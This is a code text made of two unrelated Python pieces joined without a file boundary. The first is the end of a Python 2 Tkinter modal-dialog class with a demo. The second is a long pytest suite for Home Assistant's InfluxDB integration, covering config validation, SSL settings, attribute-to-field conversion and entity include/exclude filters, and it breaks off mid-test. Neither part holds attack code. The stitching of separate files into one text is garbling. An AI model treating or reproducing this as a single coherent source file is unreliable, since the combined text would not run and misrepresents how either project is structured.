w = Tkinter.Button(box, text="OK", width=10,
command=self.ok, default=Tkinter.ACTIVE)
w.pack(side=Tkinter.LEFT, padx=5, pady=5)
w = Tkinter.Button(box, text="Cancel", width=10, command=self.cancel)
w.pack(side=Tkinter.LEFT, padx=5, pady=5)
self.bind("<Return>", self.ok)
self.bind("<Escape>", self.cancel)
box.pack()
#
# standard button semantics
def ok(self, event=None):
if not self.validate():
self.initial_focus.focus_set() # put focus back
return
self.withdraw()
self.update_idletasks()
self.apply()
self.cancel()
def cancel(self, event=None):
# put focus back to the parent window
self.parent.focus_set()
self.destroy()
#
# command hooks
def validate(self):
return 1 # override
def apply(self):
pass # override
if __name__ == '__main__':
class MyDialog(ModalDialog):
def body(self, master):
Tkinter.Label(master, text="First:").grid(row=0)
Tkinter.Label(master, text="Second:").grid(row=1)
self.e1 = IntEntry(master, '', 0, 0, 10, fg='red')
self.e2 = Tkinter.Entry(master)
self.e1.grid(row=0, column=1)
self.e2.grid(row=1, column=1)
return self.e1 # initial focus
def apply(self):
first = string.atoi(self.e1.get())
second = string.atoi(self.e2.get())
self.result = first, second
root = Tkinter.Tk()
Tkinter.Button(root, text="Hello!").pack()
root.update()
d = MyDialog(root)
print d.result
|
|
"""The tests for the InfluxDB component."""
from dataclasses import dataclass
import datetime
from unittest.mock import MagicMock, Mock, call, patch
import pytest
import homeassistant.components.influxdb as influxdb
from homeassistant.components.influxdb.const import DEFAULT_BUCKET
from homeassistant.const import (
EVENT_STATE_CHANGED,
PERCENTAGE,
STATE_OFF,
STATE_ON,
STATE_STANDBY,
)
from homeassistant.core import split_entity_id
from homeassistant.setup import async_setup_component
INFLUX_PATH = "homeassistant.components.influxdb"
INFLUX_CLIENT_PATH = f"{INFLUX_PATH}.InfluxDBClient"
BASE_V1_CONFIG = {}
BASE_V2_CONFIG = {
"api_version": influxdb.API_VERSION_2,
"organization": "org",
"token": "token",
}
@dataclass
class FilterTest:
"""Class for capturing a filter test."""
id: str
should_pass: bool
@pytest.fixture(autouse=True)
def mock_batch_timeout(hass, monkeypatch):
"""Mock the event bus listener and the batch timeout for tests."""
hass.bus.listen = MagicMock()
monkeypatch.setattr(
f"{INFLUX_PATH}.InfluxThread.batch_timeout",
Mock(return_value=0),
)
@pytest.fixture(name="mock_client")
def mock_client_fixture(request):
"""Patch the InfluxDBClient object with mock for version under test."""
if request.param == influxdb.API_VERSION_2:
client_target = f"{INFLUX_CLIENT_PATH}V2"
else:
client_target = INFLUX_CLIENT_PATH
with patch(client_target) as client:
yield client
@pytest.fixture(name="get_mock_call")
def get_mock_call_fixture(request):
"""Get version specific lambda to make write API call mock."""
def v2_call(body, precision):
data = {"bucket": DEFAULT_BUCKET, "record": body}
if precision is not None:
data["write_precision"] = precision
return call(**data)
if request.param == influxdb.API_VERSION_2:
return lambda body, precision=None: v2_call(body, precision)
# pylint: disable=unnecessary-lambda
return lambda body, precision=None: call(body, time_precision=precision)
def _get_write_api_mock_v1(mock_influx_client):
"""Return the write api mock for the V1 client."""
return mock_influx_client.return_value.write_points
def _get_write_api_mock_v2(mock_influx_client):
"""Return the write api mock for the V2 client."""
return mock_influx_client.return_value.write_api.return_value.write
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api",
[
(
influxdb.DEFAULT_API_VERSION,
{
"api_version": influxdb.DEFAULT_API_VERSION,
"username": "user",
"password": "password",
"verify_ssl": "False",
},
_get_write_api_mock_v1,
),
(
influxdb.API_VERSION_2,
{
"api_version": influxdb.API_VERSION_2,
"token": "token",
"organization": "organization",
"bucket": "bucket",
},
_get_write_api_mock_v2,
),
],
indirect=["mock_client"],
)
async def test_setup_config_full(hass, mock_client, config_ext, get_write_api):
"""Test the setup with full configuration."""
config = {
"influxdb": {
"host": "host",
"port": 123,
"database": "db",
"max_retries": 4,
"ssl": "False",
}
}
config["influxdb"].update(config_ext)
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
assert hass.bus.listen.called
assert EVENT_STATE_CHANGED == hass.bus.listen.call_args_list[0][0][0]
assert get_write_api(mock_client).call_count == 1
@pytest.mark.parametrize(
"mock_client, config_base, config_ext, expected_client_args",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"verify_ssl": False,
},
{
"ssl": True,
"verify_ssl": False,
},
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"verify_ssl": True,
},
{
"ssl": True,
"verify_ssl": True,
},
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"verify_ssl": True,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"ssl": True,
"verify_ssl": "fake/path/ca.pem",
},
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"ssl": True,
"verify_ssl": "fake/path/ca.pem",
},
),
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
{
"ssl": True,
"verify_ssl": False,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"ssl": True,
"verify_ssl": False,
},
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
{
"api_version": influxdb.API_VERSION_2,
"verify_ssl": False,
},
{
"verify_ssl": False,
},
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
{
"api_version": influxdb.API_VERSION_2,
"verify_ssl": True,
},
{
"verify_ssl": True,
},
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
{
"api_version": influxdb.API_VERSION_2,
"verify_ssl": True,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"verify_ssl": True,
"ssl_ca_cert": "fake/path/ca.pem",
},
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
{
"api_version": influxdb.API_VERSION_2,
"verify_ssl": False,
"ssl_ca_cert": "fake/path/ca.pem",
},
{
"verify_ssl": False,
"ssl_ca_cert": "fake/path/ca.pem",
},
),
],
indirect=["mock_client"],
)
async def test_setup_config_ssl(
hass, mock_client, config_base, config_ext, expected_client_args
):
"""Test the setup with various verify_ssl values."""
config = {"influxdb": config_base.copy()}
config["influxdb"].update(config_ext)
with patch("os.access", return_value=True):
with patch("os.path.isfile", return_value=True):
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
assert hass.bus.listen.called
assert EVENT_STATE_CHANGED == hass.bus.listen.call_args_list[0][0][0]
assert expected_client_args.items() <= mock_client.call_args.kwargs.items()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api",
[
(influxdb.DEFAULT_API_VERSION, BASE_V1_CONFIG, _get_write_api_mock_v1),
(influxdb.API_VERSION_2, BASE_V2_CONFIG, _get_write_api_mock_v2),
],
indirect=["mock_client"],
)
async def test_setup_minimal_config(hass, mock_client, config_ext, get_write_api):
"""Test the setup with minimal configuration and defaults."""
config = {"influxdb": {}}
config["influxdb"].update(config_ext)
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
assert hass.bus.listen.called
assert EVENT_STATE_CHANGED == hass.bus.listen.call_args_list[0][0][0]
assert get_write_api(mock_client).call_count == 1
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api",
[
(influxdb.DEFAULT_API_VERSION, {"username": "user"}, _get_write_api_mock_v1),
(
influxdb.DEFAULT_API_VERSION,
{"token": "token", "organization": "organization"},
_get_write_api_mock_v1,
),
(
influxdb.API_VERSION_2,
{"api_version": influxdb.API_VERSION_2},
_get_write_api_mock_v2,
),
(
influxdb.API_VERSION_2,
{"api_version": influxdb.API_VERSION_2, "organization": "organization"},
_get_write_api_mock_v2,
),
(
influxdb.API_VERSION_2,
{
"api_version": influxdb.API_VERSION_2,
"token": "token",
"organization": "organization",
"username": "user",
"password": "pass",
},
_get_write_api_mock_v2,
),
],
indirect=["mock_client"],
)
async def test_invalid_config(hass, mock_client, config_ext, get_write_api):
"""Test the setup with invalid config or config options specified for wrong version."""
config = {"influxdb": {}}
config["influxdb"].update(config_ext)
assert not await async_setup_component(hass, influxdb.DOMAIN, config)
async def _setup(hass, mock_influx_client, config_ext, get_write_api):
"""Prepare client for next test and return event handler method."""
config = {
"influxdb": {
"host": "host",
"exclude": {"entities": ["fake.excluded"], "domains": ["another_fake"]},
}
}
config["influxdb"].update(config_ext)
assert await async_setup_component(hass, influxdb.DOMAIN, config)
await hass.async_block_till_done()
# A call is made to the write API during setup to test the connection.
# Therefore we reset the write API mock here before the test begins.
get_write_api(mock_influx_client).reset_mock()
return hass.bus.listen.call_args_list[0][0][1]
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
# map of HA State to valid influxdb [state, value] fields
valid = {
"1": [None, 1],
"1.0": [None, 1.0],
STATE_ON: [STATE_ON, 1],
STATE_OFF: [STATE_OFF, 0],
STATE_STANDBY: [STATE_STANDBY, None],
"foo": ["foo", None],
}
for in_, out in valid.items():
attrs = {
"unit_of_measurement": "foobars",
"longitude": "1.1",
"latitude": "2.2",
"battery_level": f"99{PERCENTAGE}",
"temperature": "20c",
"last_seen": "Last seen 23 minutes ago",
"updated_at": datetime.datetime(2017, 1, 1, 0, 0),
"multi_periods": "0.120.240.2023873",
}
state = MagicMock(
state=in_,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "foobars",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {
"longitude": 1.1,
"latitude": 2.2,
"battery_level_str": f"99{PERCENTAGE}",
"battery_level": 99.0,
"temperature_str": "20c",
"temperature": 20.0,
"last_seen_str": "Last seen 23 minutes ago",
"last_seen": 23.0,
"updated_at_str": "2017-01-01 00:00:00",
"updated_at": 20170101000000,
"multi_periods_str": "0.120.240.2023873",
},
}
]
if out[0] is not None:
body[0]["fields"]["state"] = out[0]
if out[1] is not None:
body[0]["fields"]["value"] = out[1]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_no_units(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener for missing units."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
for unit in (None, ""):
if unit:
attrs = {"unit_of_measurement": unit}
else:
attrs = {}
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.entity-id",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_inf(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with large or invalid numbers."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
attrs = {"bignumstring": "9" * 999, "nonumstring": "nan"}
state = MagicMock(
state=8,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.entity-id",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"value": 8},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_states(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against ignored states."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
for state_state in (1, "unknown", "", "unavailable"):
state = MagicMock(
state=state_state,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.entity-id",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
if state_state == 1:
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
else:
assert not write_api.called
write_api.reset_mock()
def execute_filter_test(hass, tests, handler_method, write_api, get_mock_call):
"""Execute all tests for a given filtering test."""
for test in tests:
domain, entity_id = split_entity_id(test.id)
state = MagicMock(
state=1,
domain=domain,
entity_id=test.id,
object_id=entity_id,
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": test.id,
"tags": {"domain": domain, "entity_id": entity_id},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
if test.should_pass:
write_api.assert_called_once()
assert write_api.call_args == get_mock_call(body)
else:
assert not write_api.called
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_denylist(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a denylist."""
config = {"exclude": {"entities": ["fake.denylisted"]}, "include": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("fake.denylisted", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_denylist_domain(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a domain denylist."""
config = {"exclude": {"domains": ["another_fake"]}, "include": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("another_fake.denylisted", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_denylist_glob(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a glob denylist."""
config = {"exclude": {"entity_globs": ["*.excluded_*"]}, "include": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("fake.excluded_entity", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_allowlist(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against an allowlist."""
config = {"include": {"entities": ["fake.included"]}, "exclude": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.included", True),
FilterTest("fake.excluded", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_allowlist_domain(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a domain allowlist."""
config = {"include": {"domains": ["fake"]}, "exclude": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("another_fake.excluded", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_allowlist_glob(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a glob allowlist."""
config = {"include": {"entity_globs": ["*.included_*"]}, "exclude": {}}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.included_entity", True),
FilterTest("fake.denied", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_filtered_allowlist(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against an allowlist filtered by denylist."""
config = {
"include": {
"domains": ["fake"],
"entities": ["another_fake.included"],
"entity_globs": "*.included_*",
},
"exclude": {
"entities": ["fake.excluded"],
"domains": ["another_fake"],
"entity_globs": "*.excluded_*",
},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("another_fake.included", True),
FilterTest("test.included_entity", True),
FilterTest("fake.excluded", False),
FilterTest("another_fake.denied", False),
FilterTest("fake.excluded_entity", False),
FilterTest("another_fake.included_entity", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_filtered_denylist(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener against a domain/glob denylist with an entity id allowlist."""
config = {
"include": {"entities": ["another_fake.included", "fake.excluded_pass"]},
"exclude": {"domains": ["another_fake"], "entity_globs": "*.excluded_*"},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
write_api = get_write_api(mock_client)
tests = [
FilterTest("fake.ok", True),
FilterTest("another_fake.included", True),
FilterTest("fake.excluded_pass", True),
FilterTest("another_fake.denied", False),
FilterTest("fake.excluded_entity", False),
]
execute_filter_test(hass, tests, handler_method, write_api, get_mock_call)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_invalid_type(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener when an attribute has an invalid type."""
handler_method = await _setup(hass, mock_client, config_ext, get_write_api)
# map of HA State to valid influxdb [state, value] fields
valid = {
"1": [None, 1],
"1.0": [None, 1.0],
STATE_ON: [STATE_ON, 1],
STATE_OFF: [STATE_OFF, 0],
STATE_STANDBY: [STATE_STANDBY, None],
"foo": ["foo", None],
}
for in_, out in valid.items():
attrs = {
"unit_of_measurement": "foobars",
"longitude": "1.1",
"latitude": "2.2",
"invalid_attribute": ["value1", "value2"],
}
state = MagicMock(
state=in_,
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "foobars",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {
"longitude": 1.1,
"latitude": 2.2,
"invalid_attribute_str": "['value1', 'value2']",
},
}
]
if out[0] is not None:
body[0]["fields"]["state"] = out[0]
if out[1] is not None:
body[0]["fields"]["value"] = out[1]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_default_measurement(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with a default measurement."""
config = {"default_measurement": "state"}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.ok",
object_id="ok",
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "state",
"tags": {"domain": "fake", "entity_id": "ok"},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_unit_of_measurement_field(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener for unit of measurement field."""
config = {"override_measurement": "state"}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
attrs = {"unit_of_measurement": "foobars"}
state = MagicMock(
state="foo",
domain="fake",
entity_id="fake.entity-id",
object_id="entity",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "state",
"tags": {"domain": "fake", "entity_id": "entity"},
"time": 12345,
"fields": {"state": "foo", "unit_of_measurement_str": "foobars"},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_tags_attributes(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener when some attributes should be tags."""
config = {"tags_attributes": ["friendly_fake"]}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
attrs = {"friendly_fake": "tag_str", "field_fake": "field_str"}
state = MagicMock(
state=1,
domain="fake",
entity_id="fake.something",
object_id="something",
attributes=attrs,
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": "fake.something",
"tags": {
"domain": "fake",
"entity_id": "something",
"friendly_fake": "tag_str",
},
"time": 12345,
"fields": {"value": 1, "field_fake_str": "field_str"},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_component_override_measurement(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with overridden measurements."""
config = {
"component_config": {
"sensor.fake_humidity": {"override_measurement": "humidity"}
},
"component_config_glob": {
"binary_sensor.*motion": {"override_measurement": "motion"}
},
"component_config_domain": {"climate": {"override_measurement": "hvac"}},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
test_components = [
{"domain": "sensor", "id": "fake_humidity", "res": "humidity"},
{"domain": "binary_sensor", "id": "fake_motion", "res": "motion"},
{"domain": "climate", "id": "fake_thermostat", "res": "hvac"},
{"domain": "other", "id": "just_fake", "res": "other.just_fake"},
]
for comp in test_components:
state = MagicMock(
state=1,
domain=comp["domain"],
entity_id=f"{comp['domain']}.{comp['id']}",
object_id=comp["id"],
attributes={},
)
event = MagicMock(data={"new_state": state}, time_fired=12345)
body = [
{
"measurement": comp["res"],
"tags": {"domain": comp["domain"], "entity_id": comp["id"]},
"time": 12345,
"fields": {"value": 1},
}
]
handler_method(event)
hass.data[influxdb.DOMAIN].block_till_done()
write_api = get_write_api(mock_client)
assert write_api.call_count == 1
assert write_api.call_args == get_mock_call(body)
write_api.reset_mock()
@pytest.mark.parametrize(
"mock_client, config_ext, get_write_api, get_mock_call",
[
(
influxdb.DEFAULT_API_VERSION,
BASE_V1_CONFIG,
_get_write_api_mock_v1,
influxdb.DEFAULT_API_VERSION,
),
(
influxdb.API_VERSION_2,
BASE_V2_CONFIG,
_get_write_api_mock_v2,
influxdb.API_VERSION_2,
),
],
indirect=["mock_client", "get_mock_call"],
)
async def test_event_listener_component_measurement_attr(
hass, mock_client, config_ext, get_write_api, get_mock_call
):
"""Test the event listener with a different measurement_attr."""
config = {
"measurement_attr": "domain__device_class",
"component_config": {
"sensor.fake_humidity": {"override_measurement": "humidity"}
},
"component_config_glob": {
"binary_sensor.*motion": {"override_measurement": "motion"}
},
"component_config_domain": {"climate": {"override_measurement": "hvac"}},
}
config.update(config_ext)
handler_method = await _setup(hass, mock_client, config, get_write_api)
test_components = [
{
"domain": "sensor",
"id": "fake_temperature",
"attrs": {"device_class": "humidity"},
"res": "sensor__humidity",
},
{"domain": "sensor", "id": "fake_humidity", "attrs": {}, "res": "humidity"},
{"domain": "binary_sensor", "id": "fake_motion", "attrs": {}, "res": "motion"},
{"domain": "climate", "id": "fake_thermostat", "attrs": {}, "res": "hvac"},
